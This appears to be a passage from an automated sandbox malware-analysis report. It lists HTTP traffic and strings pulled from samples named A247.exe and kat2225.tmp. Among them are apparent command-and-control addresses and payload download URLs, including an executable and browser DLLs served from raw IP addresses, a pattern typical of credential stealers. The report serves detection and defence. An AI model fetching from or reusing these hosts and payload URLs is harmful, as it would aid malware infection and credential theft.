6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:30:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 20 5a 24 14 a4 6a 44 a9 ab 14 bd cc b1 fb 6d 87 2a d3 ab 77 5f 07 98 d9 8a da 63 c6 2a 1d 01 8b 0a 8c 5e 6e 55 53 b5 91 73 f2 73 ed 44 19 13 Data Ascii: #\ Z$jDm*w_c*^nUSssD
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:31:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:32:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:32:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:32:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:32:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:32:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:32:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:32:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:32:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:32:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:33:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:33:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:33:16 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:33:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:33:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:33:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:33:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:33:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:33:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:33:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:33:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: A247.exe, 00000005.00000003.2678333691.0000000000913000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2678080864.0000000000911000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.235.137.54/
Source: A247.exe, 00000005.00000003.2678080864.0000000000911000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.235.137.54/file/host_so.exe
Source: A247.exe, 00000005.00000003.2678080864.0000000000911000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.235.137.54/i
Source: A247.exe, 00000005.00000003.2678333691.0000000000913000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2678080864.0000000000911000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.235.137.54/n
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: explorer.exe, 00000002.00000000.2038509404.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2038509404.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: explorer.exe, 00000002.00000000.2035435817.0000000000F13000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.v
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: explorer.exe, 00000002.00000000.2038509404.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2038509404.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985759378.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: explorer.exe, 00000002.00000000.2038509404.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2038509404.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.000000000083C000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985759378.000000000084F000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.3023498282.000000000084E000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: explorer.exe, 00000002.00000000.2038509404.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2038509404.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://ocsp.digicert.com0
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: explorer.exe, 00000002.00000000.2038509404.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: 5358.exe, 00000008.00000002.2674561163.00000000042B0000.00000040.00001000.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000000.2672680740.00000000004B4000.00000002.00000001.01000000.00000008.sdmp, kat2225.tmp.8.dr String found in binary or memory: http://rpi.net.au/~ajohnson/resourcehacker
Source: explorer.exe, 00000002.00000000.2037923466.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2037895946.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2037402622.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: explorer.exe, 00000002.00000000.2042908810.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2042908810.000000000C81C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: kat2225.tmp, kat2225.tmp, 00000009.00000002.3206547696.000000006F8FD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3192617927.000000001B9BD000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: 76561199689717899[1].htm.9.dr String found in binary or memory: https://65.109.242.59
Source: kat2225.tmp, 00000009.00000003.2750844000.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2862103899.000000000084D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/
Source: kat2225.tmp, 00000009.00000003.2985489790.0000000000867000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/42.59ine
Source: kat2225.tmp, 00000009.00000003.2985940074.00000000007D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/?
Source: kat2225.tmp, 00000009.00000003.2822767715.000000000084E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985853502.000000000083C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/B
Source: kat2225.tmp, 00000009.00000003.3023498282.000000000084E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/F
Source: kat2225.tmp, 00000009.00000003.2847534612.000000000084D000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848187053.000000000084D000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2822767715.000000000084E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/K
Source: kat2225.tmp, 00000009.00000003.2985759378.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/L
Source: kat2225.tmp, 00000009.00000003.3023498282.000000000084E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/O
Source: kat2225.tmp, 00000009.00000003.3023498282.000000000084E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/P
Source: kat2225.tmp, 00000009.00000003.2822767715.000000000084E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/T;
Source: kat2225.tmp, 00000009.00000003.2880856339.000000000083C000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.000000000082E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/freebl3.dll
Source: kat2225.tmp, 00000009.00000003.2880856339.000000000083C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/freebl3.dll2.59/freebl3.dll
Source: kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.000000000082E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/freebl3.dllZ
Source: kat2225.tmp, 00000009.00000003.2985853502.000000000083C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/l3.dll
Source: kat2225.tmp, 00000009.00000003.2985853502.000000000083C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/mo
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/mozglue.dll
Source: kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.000000000082E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/mozglue.dllF
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.000000000082E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/mozglue.dllr
Source: kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.000000000082E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/msvcp140.dll
Source: kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.000000000082E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/msvcp140.dlld
Source: kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.000000000082E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985853502.000000000083C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/nss3.dll
Source: kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/nss3.dll;
Source: kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/nss3.dllAppData
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2847534612.000000000084D000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848187053.000000000084D000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985759378.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/p
Source: kat2225.tmp, 00000009.00000003.2766326619.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2719695430.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2735078163.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2750844000.00000000007FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/r
Source: kat2225.tmp, 00000009.00000003.2985759378.000000000084F000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2719695430.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985853502.000000000083C000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.00000000007FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/s
Source: kat2225.tmp, 00000009.00000003.2985759378.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/sK
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985759378.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/so
